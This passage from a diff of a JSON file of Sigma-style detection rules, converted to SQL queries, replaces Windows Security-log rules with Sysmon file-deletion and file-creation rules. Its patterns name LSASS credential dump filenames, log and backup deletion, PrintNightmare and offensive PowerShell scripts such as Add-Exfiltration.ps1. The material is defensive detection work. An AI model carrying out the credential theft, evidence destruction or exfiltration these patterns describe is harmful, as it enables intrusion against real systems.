'%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" ], - "filename": "win_security_atsvc_task.yml" + "filename": "file_delete_win_delete_iis_access_logs.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", - "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1222.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "status": "experimental", - "description": "Detects an access to 
authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Remote Service Activity via SVCCTL Named Pipe", - "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "status": "test", - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "author": "Samir Bousseaden", + "title": "Backup Files Deleted", + "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "status": "experimental", + "description": "Detects deletion of files with extensions often used for backup files. 
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitime usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" ], - "filename": "win_security_svcctl_remote_service.yml" + "filename": "file_delete_win_delete_backup_file.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "status": "experimental", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "title": "File Deleted Via Sysinternals SDelete", + "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "description": "Detects the deletion of files by the Sysinternals SDelete utility. 
It looks for the common name pattern used to rename files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitime usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "EventLog EVTX File Deleted", + "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate used of encrypted ZIP files" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" - }, - { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", - "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_delete_win_delete_event_log_files.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "title": "Tomcat WebServer Logs Deleted", + "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the tomcat server", + "During log rotation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', 
'1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_delete_win_delete_tomcat_logs.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "status": "experimental", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1137.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE 
'%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "id": 
"7a922f1b-2635-4d6c-91ef-af228b198ad3", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" + "filename": 
"file_event_win_susp_double_extension.yml" }, { - "title": "Azure AD Health Monitoring Agent Registry Keys Access", - "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" - ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" - }, - { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by 
zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unlikely" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Password Protected ZIP File Opened", - "id": "00ba9da1-b510-4f6b-b258-8d338836180f", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" ], - "filename": "win_security_susp_opened_encrypted_zip.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "DCERPC SMB Spoolss Named Pipe", - "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "title": "Installation of TeamViewer Desktop", + "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "status": "test", - "description": "Detects the use of the spoolss named pipe over SMB. 
This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "author": "OTR (Open Threat Research)", + "description": "TeamViewer_Desktop.exe is create during install", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Domain Controllers acting as printer servers too? :)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\')" ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" + "filename": "file_event_win_install_teamviewer_desktop.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", + "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.discovery" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName 
= 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -798,3013 +733,3002 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR 
